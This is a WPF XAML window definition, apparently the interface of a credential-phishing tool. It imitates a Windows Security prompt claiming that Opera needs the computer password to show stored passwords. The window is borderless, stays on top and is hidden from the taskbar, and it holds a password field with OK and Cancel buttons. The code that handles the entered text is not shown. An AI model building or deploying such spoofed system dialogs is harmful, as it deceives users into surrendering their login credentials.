SecurityLogin/MainWindow.xaml

<Window x:Class="SecurityLogin.MainWindow"
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
        xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
        xmlns:local="clr-namespace:SecurityLogin"
        mc:Ignorable="d"
        Title="Windows Security" Height="355" Width="456" Background="#FF1F1F1F" WindowStyle="None" ResizeMode="NoResize" ShowInTaskbar="False" Topmost="True" WindowStartupLocation="CenterScreen">
    <Window.Effect>
        <DropShadowEffect BlurRadius="2" Color="#FF171717" Direction="300" Opacity="0.45" RenderingBias="Quality" ShadowDepth="4"/>
    </Window.Effect>
    <Grid Height="355" VerticalAlignment="Top">
        <StackPanel x:Name="side4" HorizontalAlignment="Left" Height="1" VerticalAlignment="Top" Width="456" Background="#FF338571"/>
        <StackPanel x:Name="side3" HorizontalAlignment="Left" Height="355" VerticalAlignment="Top" Width="1" Background="#FF338571"/>
        <StackPanel x:Name="side2" HorizontalAlignment="Left" Height="1" VerticalAlignment="Bottom" Width="456" Margin="0,347,0,0" Background="#FF338571"/>
        <StackPanel x:Name="side1" HorizontalAlignment="Right" Height="355" VerticalAlignment="Top" Width="1" Background="#FF338571"/>
        <Label Content="Windows Security&#xD;&#xA;" HorizontalAlignment="Left" VerticalAlignment="Top" Margin="18,3,0,0" Width="117" Height="29" Foreground="#FFF9F9F9"/>
        <Label x:Name="processname" Content="Opera" HorizontalAlignment="Left" VerticalAlignment="Top" Margin="17,28,0,0" Foreground="White" FontSize="20.6" Width="73"/>
        <Label Content="To see Opera's stored passwords, please enter your computer&#xD;&#xA;password." HorizontalAlignment="Left" VerticalAlignment="Top" Margin="18,76,0,0" Foreground="White" Width="408" Height="48" FontSize="13.5"/>
        <Label x:Name="compname" Content="Username" HorizontalAlignment="Left" VerticalAlignment="Top" Margin="17,130,0,0" Foreground="White" Width="193" FontSize="13.5"/>
        <TextBox x:Name="textbox" HorizontalAlignment="Left" Height="32" TextWrapping="Wrap" Text="Password" VerticalAlignment="Top" Width="296" Margin="22,166,0,0" BorderThickness="1" Background="#FFFDFDFD" Foreground="#FF7D8185" Padding="7,6,1,1" FontSize="13" ClipToBounds="True" SnapsToDevicePixels="True" IsUndoEnabled="False" TextDecorations="{x:Null}" MaxLines="1" MouseDown="textbox_MouseDown">
            <TextBox.BorderBrush>
                <SolidColorBrush Color="#FF338571" Opacity="1"/>
            </TextBox.BorderBrush>
        </TextBox>
        
        <Label x:Name="compname2" Content="MachineName\Username" HorizontalAlignment="Left" VerticalAlignment="Top" Margin="17,205,0,0" Foreground="White" Width="408" FontSize="13.5"/>
        <Label x:Name="choices" Content="More choices" HorizontalAlignment="Left" VerticalAlignment="Top" Margin="17,254,0,0" Foreground="#FF338571" Width="161" FontSize="14" MouseEnter="Label_MouseEnter" MouseLeave="choices_MouseLeave"/>
        <Button Content="OK" HorizontalAlignment="Left" VerticalAlignment="Top" Width="203" Margin="22,295,0,0" Height="37" Background="#FF4C4C4C" Foreground="White" ScrollViewer.VerticalScrollBarVisibility="Disabled" BorderThickness="0" Click="Button_Click" HorizontalContentAlignment="Center" VerticalContentAlignment="Center" Padding="0" FontSize="13" BorderBrush="{x:Null}"/>
        <Button Content="Cancel" HorizontalAlignment="Left" VerticalAlignment="Top" Width="203" Margin="229,295,0,0" Height="37" Background="#FF4C4C4C" Foreground="White" ScrollViewer.VerticalScrollBarVisibility="Disabled" BorderThickness="0" Padding="0" FontSize="13" BorderBrush="{x:Null}" Click="Button_Click_1"/>

    </Grid>
</Window>
